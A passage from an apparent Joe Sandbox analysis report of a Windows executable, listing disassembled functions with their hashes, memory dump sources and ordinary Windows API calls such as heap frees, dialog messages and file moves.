                                                                                    • Opcode Fuzzy Hash: 84534681927d0d551d83530a4cc010f1e42e28eaf2bc7283e8d38c08a7954a89
                                                                                    • Instruction Fuzzy Hash: BBE116755083808FC345CF69D89086ABBF0AFCA300F49495EF9D597362D335EA5ACB62
                                                                                    Function 00162DB5 Relevance: .3, Instructions: 263COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                    • Instruction ID: 01fce67c383d8989b87a8cb88aea0840c5ba99405529dc6206ed80f8610d8544
                                                                                    • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                    • Instruction Fuzzy Hash: 8991A9B1204B458BD724EF68DC94BBE73D5AF60300F14092DF9A68B282DBB59628C752
                                                                                    Function 00172B78 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 221f9cdcaad3af84e66ca56946175f10b6c0a757d87c575b017c98a73dff4288
                                                                                    • Instruction ID: ed205d9be4c7e4a79a895866ef6ea3d097e3e299a1b57b48c406bbd664e11986
                                                                                    • Opcode Fuzzy Hash: 221f9cdcaad3af84e66ca56946175f10b6c0a757d87c575b017c98a73dff4288
                                                                                    • Instruction Fuzzy Hash: CC61897160070867DA394E688956BFE33B4EB36700F24C919E88EDB282D775DEC39316
                                                                                    Function 001630E6 Relevance: .2, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                    • Instruction ID: e50c0738e1ca064086517382808c5007bfcc7dec24f6df511426b329e65aa3f7
                                                                                    • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                    • Instruction Fuzzy Hash: 1E714A707043818BEB24DE68CCD4BBD37D1ABA1304F04492DE9E68B282DB74DA99C756
                                                                                    Function 0015D1D2 Relevance: .2, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0c939ba4d14b7b804a931462057feffe6bc8ecfcab404f52450912381c25fd0b
                                                                                    • Instruction ID: e36402a913be1c939318e0aff53915a1d7bc4182d685c4a0547c3a888cfc591c
                                                                                    • Opcode Fuzzy Hash: 0c939ba4d14b7b804a931462057feffe6bc8ecfcab404f52450912381c25fd0b
                                                                                    • Instruction Fuzzy Hash: D581CF9210A2D0ADC75A8F3D38E42E53FA1577B301F1D04ABD8D58BAA3D13686DDD722
                                                                                    Function 0015DBE2 Relevance: .2, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23abbddd34a16cb9f19363b136f45132e8e4047a68dd169667f04476a4a289d5
                                                                                    • Instruction ID: 8d422d0426493c0da997103c660c8207de5355791495afd09185d254692ec72f
                                                                                    • Opcode Fuzzy Hash: 23abbddd34a16cb9f19363b136f45132e8e4047a68dd169667f04476a4a289d5
                                                                                    • Instruction Fuzzy Hash: 0451D0319083958EC722CF29918046EBFF1AFAA315F59489EE8E54B252C330D789CB53
                                                                                    Function 0015EC97 Relevance: .1, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb40b1c782fe9082a340f12c220babb0661b2065524db7bfd945a34690d1ba83
                                                                                    • Instruction ID: d1b2a3313f7bbc30ee6755c826a982abd809b97ea255c89763a18c052e7f1255
                                                                                    • Opcode Fuzzy Hash: bb40b1c782fe9082a340f12c220babb0661b2065524db7bfd945a34690d1ba83
                                                                                    • Instruction Fuzzy Hash: 0E512571A083028FC748CF19D49059AF7E1FF88314F058A2EE899A7740DB34EA59CB96
                                                                                    Function 00162B3A Relevance: .1, Instructions: 112COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                    • Instruction ID: b804b30b315c870bcdd3120e2fe5476886bd63d6ce516967dc6adb868ab58533
                                                                                    • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                    • Instruction Fuzzy Hash: 1F31E0B160475A8FC714DF28CC5126ABBD0FB95301F04862DE8DAD7341C734E919CB52
                                                                                    Function 00155E96 Relevance: .1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51fce91e9f5d783804c7d7a1c3d93e88e6db355dab224693490672883548e41b
                                                                                    • Instruction ID: d5080658bcda5cc98f919f2de6266152dd67e8f68a64fb6f46ad92cffc3c3e27
                                                                                    • Opcode Fuzzy Hash: 51fce91e9f5d783804c7d7a1c3d93e88e6db355dab224693490672883548e41b
                                                                                    • Instruction Fuzzy Hash: 3321FF32A205655BCB08CF2DECF54367351EB46302786812BEE568F6D0C735EA69C7E0
                                                                                    Function 0017958D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 001795D1
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179189
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017919B
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791AD
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791BF
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791D1
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791E3
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791F5
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179207
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179219
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017922B
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017923D
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017924F
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179261
                                                                                    • _free.LIBCMT ref: 001795C6
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 001795E8
                                                                                    • _free.LIBCMT ref: 001795FD
                                                                                    • _free.LIBCMT ref: 00179608
                                                                                    • _free.LIBCMT ref: 0017962A
                                                                                    • _free.LIBCMT ref: 0017963D
                                                                                    • _free.LIBCMT ref: 0017964B
                                                                                    • _free.LIBCMT ref: 00179656
                                                                                    • _free.LIBCMT ref: 0017968E
                                                                                    • _free.LIBCMT ref: 00179695
                                                                                    • _free.LIBCMT ref: 001796B2
                                                                                    • _free.LIBCMT ref: 001796CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: d80f4e0a4a3b95e6b9d8344ab23f1dceb9b570a90c7004718350b6981d5798ac
                                                                                    • Instruction ID: b60996eb43b18bf68934a330301c31599d24e31128d0f308a6211551512fd8c5
                                                                                    • Opcode Fuzzy Hash: d80f4e0a4a3b95e6b9d8344ab23f1dceb9b570a90c7004718350b6981d5798ac
                                                                                    • Instruction Fuzzy Hash: 05311971604701DFEF21AA38D885B9A73FAAF10324F20C52AF59DD7151DF76AD988B10
                                                                                    Function 0016B8BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0016B8DD
                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0016B90C
                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0016B92A
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0016B941
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0016B954
                                                                                      • Part of subcall function 00168B22: GetDC.USER32(00000000), ref: 00168B2E
                                                                                      • Part of subcall function 00168B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00168B3D
                                                                                      • Part of subcall function 00168B22: ReleaseDC.USER32(00000000,00000000), ref: 00168B4B
                                                                                      • Part of subcall function 00168ADF: GetDC.USER32(00000000), ref: 00168AEB
                                                                                      • Part of subcall function 00168ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00168AFA
                                                                                      • Part of subcall function 00168ADF: ReleaseDC.USER32(00000000,00000000), ref: 00168B08
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0016B97B
                                                                                    • DeleteObject.GDI32(00000000), ref: 0016B982
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0016B98B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 1444658586-1882779555
                                                                                    • Opcode ID: fe24e95332281cec49bf84d06d721572bace5c0368795da9262d40c8f61496ab
                                                                                    • Instruction ID: daad535e49a8820cd1594f67ed8b7ed9b65df5888af7a5597acad0cb94af205e
                                                                                    • Opcode Fuzzy Hash: fe24e95332281cec49bf84d06d721572bace5c0368795da9262d40c8f61496ab
                                                                                    • Instruction Fuzzy Hash: 0421F3B25446247BEB216B64CC8AFEE762CEF15710F404112FE01E6481CB744E9187B6
                                                                                    Function 0017622B Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0017623F
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 0017624B
                                                                                    • _free.LIBCMT ref: 00176256
                                                                                    • _free.LIBCMT ref: 00176261
                                                                                    • _free.LIBCMT ref: 0017626C
                                                                                    • _free.LIBCMT ref: 00176277
                                                                                    • _free.LIBCMT ref: 00176282
                                                                                    • _free.LIBCMT ref: 0017628D
                                                                                    • _free.LIBCMT ref: 00176298
                                                                                    • _free.LIBCMT ref: 001762A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 64591d7657a85286974c55b2516f9535f983c0fc04ad6136c34d13230eb604c1
                                                                                    • Instruction ID: 010d21c717b631e1658985418cb527621ab27fa46f8b8d49418d4bac8b656eb3
                                                                                    • Opcode Fuzzy Hash: 64591d7657a85286974c55b2516f9535f983c0fc04ad6136c34d13230eb604c1
                                                                                    • Instruction Fuzzy Hash: 5E116675610608EFCF01EF64C942CD93BB6FF14364B5185A5BA8C4B122DB72DA509B40
                                                                                    Function 001520E6 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 0-2277559157
                                                                                    • Opcode ID: 49e5dd78ca48baed67d7c959206d151389630bace68d7b82ac3fc1af351ee75b
                                                                                    • Instruction ID: 7ed66506e7d3f5b9c7341179584e76523e69a33065900ca14f15b2cb161fd5a9
                                                                                    • Opcode Fuzzy Hash: 49e5dd78ca48baed67d7c959206d151389630bace68d7b82ac3fc1af351ee75b
                                                                                    • Instruction Fuzzy Hash: 7AF11A72604340CFDB15EF648895BFA77A5AFA6301F080469FCA59F283D774994CC7A2
                                                                                    Function 0016995F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 001699AF
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 001699DC
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001699F1
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00169A02
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00169A0B
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00169A1F
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00169A31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    • Opcode ID: 1a618427c344ab9e1faaefe5715b74d39adba02286ea2d872688e988ec899017
                                                                                    • Instruction ID: 419703367c91cd39532dd13a21583142cf7ee734e596179821f9f6bab06824c0
                                                                                    • Opcode Fuzzy Hash: 1a618427c344ab9e1faaefe5715b74d39adba02286ea2d872688e988ec899017
                                                                                    • Instruction Fuzzy Hash: 8E2108322002047FEA116B65ED85E7B3BADEF87B88F014009F600A3890CB769D91D772
                                                                                    Function 0015922D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00159232
                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00159255
                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00159274
                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    • _swprintf.LIBCMT ref: 00159310
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00159385
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001593C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 2111052971-3303766350
                                                                                    • Opcode ID: 5d247af51c12682f063138d6e3971d5273676f6ddd3cc8dfab1610a3fc1db9f9
                                                                                    • Instruction ID: 0bfa2bf84da2ea64395a5c3c76ba3cb0f6a64d8b96e1ae55b3ee1b35a40d5fb8
                                                                                    • Opcode Fuzzy Hash: 5d247af51c12682f063138d6e3971d5273676f6ddd3cc8dfab1610a3fc1db9f9
                                                                                    • Instruction Fuzzy Hash: 78417C71911258EADF21ABA08D84EEE777CBF14382F0040A5B915AB042EB309B89CF61
                                                                                    Function 00167EE5 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00168705,?), ref: 00167FBA
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00167FDB
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00168002
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 4094277203-4209811716
